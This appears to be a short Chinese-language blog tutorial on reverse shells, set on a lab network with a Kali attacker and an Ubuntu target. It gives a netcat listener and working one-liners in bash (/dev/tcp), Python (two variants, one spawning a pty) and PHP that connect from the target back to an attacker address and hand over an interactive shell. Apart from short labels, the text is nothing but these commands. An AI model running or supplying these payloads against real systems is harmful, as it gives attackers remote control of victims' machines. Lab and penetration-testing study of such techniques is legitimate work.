反弹shell方法

环境:
攻击: 192.168.188.63 (kali)
目标: 192.168.72.130 (ubuntu)


kali监听指定端口:

nc -lvp 1234

![1.png][1]

反弹shell:
ubuntu下

方法一 bash:

bash -i >& /dev/tcp/192.168.188.63/1234 0>&1

方法二 python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.188.63",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.3.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

方法三 php:

php -r '$sock=fsockopen("192.168.188.63",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

[1]: uploads/2020/03/1972428766.png [1]: http://www.sumor.top/usr/uploads/2020/03/1972428766.png